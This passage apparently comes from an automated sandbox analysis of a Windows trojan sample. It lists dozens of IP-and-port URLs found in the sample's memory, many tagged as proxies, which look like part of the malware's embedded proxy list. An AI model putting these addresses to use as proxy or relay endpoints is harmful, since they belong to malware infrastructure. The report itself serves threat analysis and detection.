                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.220.228.147:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.220.228.147:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.238.231.65:1994
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.238.231.65:1994://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC733000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.238.231.71:1994
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC75F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.238.231.71:1994://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.239.163.166:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.239.163.166:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.242.125.186:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.242.125.186:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.242.126.170:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.242.126.170:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF6C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.26.218.116:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.26.218.116:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.43.92.120:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.43.92.120:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.52.178.17
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.52.178.17://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.52.178.17:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.54.100.74:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.54.100.74:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.56.241.170:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.56.241.170:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.57.245.250:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.57.245.250:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.6.32.84:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.6.32.84:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.6.56.133:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.6.56.133:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.101.39:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.101.39:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.32.168:6969
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.32.168:6969://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.48.24:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.48.24:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.55.138:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.55.138:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.84.166:9812
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.84.166:9812://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.88.147:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.88.147:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.69.157.213:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.69.157.213:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.71.24.129:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.71.24.129:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.72.102.42:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.72.102.42:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.82.105.123:43949
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.82.105.123:43949://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.89.37.73:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.89.37.73:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.125:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.125:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.151:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.151:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.165:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.165:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66CD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.35:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.35:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.95.195.105:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.95.195.105:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.85:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.85:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.90:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.90:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD85000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.93:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.93:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.1.116
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.1.116://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.1.116:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.10:8085
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.10:8085://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.27:8083
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.27:8083://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.68.178:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.68.178:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.103.219.225:48612
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.103.219.225:48612://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.179.216.84:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.179.216.84:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.252.101.46:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.252.101.46:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.252.178.138:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.252.178.138:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.53.112.170:45619
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.53.112.170:45619://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.96.251.53
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.96.251.53://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.96.251.53:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.16.160:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.16.160:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.16.6:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.16.6:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.19.66:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.19.66:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.2.198:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.2.198:5678://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C782D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.6.150:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.6.150:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134.10:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134.10:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C825A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.139.163:19404
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.139.163:19404://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.12.112.70:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.12.112.70:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.140.34.227:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.140.34.227:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.140.42.83:31511
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.140.42.83:31511://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.141.236.3:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.141.236.3:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.158.15.201:50877
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.158.15.201:50877://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:47415
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:47415://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.252.85:52119
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.252.85:52119://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA66A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:12919
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:12919://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:20317
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:20317://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:24299
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:24299://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:41026
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:41026://proxy
